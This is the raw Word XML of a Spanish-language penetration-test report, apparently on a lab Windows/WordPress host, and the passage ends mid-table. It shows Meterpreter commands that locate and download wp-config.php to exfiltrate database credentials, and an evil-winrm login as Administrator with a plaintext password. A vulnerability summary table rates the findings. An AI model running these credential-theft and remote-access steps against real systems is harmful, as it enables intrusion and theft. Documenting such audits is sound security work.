    <w:p w14:paraId="1466A584" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="79E8475D">
          <v:rect id="_x0000_i1032" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E87259" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acceso a Archivos Internos y Extracción de Credenciales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30779F6B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Una vez obtenida la ejecución remota en el sistema mediante sesión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> se procedió a la búsqueda de archivos sensibles dentro del sistema.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Dado que previamente se había identificado el uso de WordPress, se decidió localizar el archivo de configuración (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>) ya que este suele contener credenciales de acceso a la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B929A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Búsqueda del archivo de configuración</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Se realizó una búsqueda en el sistema para localizar el archivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /s /b C:\wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA409C5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Como resultado se identificó la siguiente ruta:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\wamp64\www\wordpress\wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42178CBA" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descarga del archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">Una vez localizado se procedió a la descarga del archivo al equipo atacante mediante </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\\wamp64\\www\\wordpress\\wp-config.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El archivo fue transferido correctamente al sistema del auditor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EA453" w14:textId="0FB7D971" w:rsidR="00301B4F" w:rsidRDefault="00964FBA" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00964FBA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B1D70A3" wp14:editId="3A67E744">
            <wp:extent cx="5400040" cy="268605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13F9" w14:textId="68437313" w:rsidR="00964FBA" w:rsidRPr="00301B4F" w:rsidRDefault="00586904" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00586904">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EA28C8B" wp14:editId="62F405D3">
            <wp:extent cx="5400040" cy="268605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B515" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>El acceso previo al panel web no permitió visualizar este archivo debido a restricciones del servidor y configuraciones relacionadas con localhost.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Sin embargo, al obtener acceso directo al sistema fue posible acceder al archivo de configuración que contiene información sensible como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899B18E" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Credenciales de la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D8700" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Configuración interna del sitio WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270F2DA" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>El archivo de configuración de WordPress contiene credenciales en texto plano claro para la conexión con la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322165BF" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>La obtención de estas credenciales implica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46490DFA" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Acceso directo a la base de datos del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA157F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Posibilidad de lectura, modificación o eliminación de información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470795A2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Acceso a datos sensibles (usuarios, contraseñas, contenidos del sitio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904424B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"La cadena de ataque demuestra cómo una vulnerabilidad inicial en el servicio web puede derivar en el compromiso total del sistema y la exposición de credenciales críticas."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FF3F1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="5F06A482">
          <v:rect id="_x0000_i1033" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE1CF8" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acceso Remoto mediante </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61DA4DAD" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Tras la obtención de credenciales desde el archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>, se procedió a su reutilización sobre otros servicios del sistema.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">Se identificó que el servicio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> (puerto 5985) estaba activo, por lo que se intentó el acceso remoto utilizando dichas credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2E228" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evil-winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 192.168.0.26 -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p T00MuchW0rk70D0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB9D45" w14:textId="5CBF67A5" w:rsidR="00586904" w:rsidRPr="00301B4F" w:rsidRDefault="00586904" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00586904">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F817F5" wp14:editId="2CDCCFFF">
            <wp:extent cx="5400040" cy="268605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43C5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clasificación de la vulnerabilidad</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tipo: Reutilización de credenciales/acceso remoto no autorizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severidad: CRÍTICA</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacto: Control total del sistema (acceso como administrador)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C974F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">La reutilización de credenciales ha permitido el acceso directo al sistema mediante </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> con privilegios de administrador, confirmando el compromiso total de la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39959B20" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="1CE20B63">
          <v:rect id="_x0000_i1034" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6CE3FB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resumen de Vulnerabilidades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1861"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="1666"/>
        <w:gridCol w:w="30"/>
        <w:gridCol w:w="3924"/>
      </w:tblGrid>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="3ACAAFAC" w14:textId="77777777" w:rsidTr="00301B4F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72E75A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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22595C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cantidad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CB0D50" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Porcentaje</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="325E6FBE" w14:textId="77777777" w:rsidTr="00301B4F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C22BC2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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1575E4" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F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585916" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>30%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="2B08A6DA" w14:textId="77777777" w:rsidTr="00301B4F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F1A230" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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E8074C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F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6CABD3" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="04D82537" w14:textId="77777777" w:rsidTr="00301B4F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F5D3F0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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D05064" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F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A8DAA1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>30%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="2D7C1EF7" w14:textId="77777777" w:rsidTr="00301B4F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185078" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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D41338" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F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F1F622" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="7AECC445" w14:textId="77777777" w:rsidTr="00301B4F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BCAE71" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Informativa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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7CEE2F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F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CA3F57" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="2F7E2076" w14:textId="77777777" w:rsidTr="00301B4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3278D6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F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35287A0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerabilidad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029F5D1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Severidad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C833F6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="015AB638" w14:textId="77777777" w:rsidTr="00301B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01C45" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>1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394EE5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Acceso SMB con credenciales válidas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947A24" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔴</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Crítica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1E6D7A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Permite acceso a recursos internos y ejecución remota</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="5385246B" w14:textId="77777777" w:rsidTr="00301B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0D2E1B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>2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AE7848" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Ejecución remota mediante SMB (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>PsExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4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494986" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔴</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Crítica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964FED" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve">Permite obtener </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>shell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> en el sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="62F8D6F1" w14:textId="77777777" w:rsidTr="00301B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D2F73C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>3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6394E1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve">Exposición de credenciales en </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>wp-config.php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538501" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔴</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Crítica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226E93" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Credenciales en texto plano de la base de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="129E1FAC" w14:textId="77777777" w:rsidTr="00301B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5AB7B6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>4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46AAFD" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
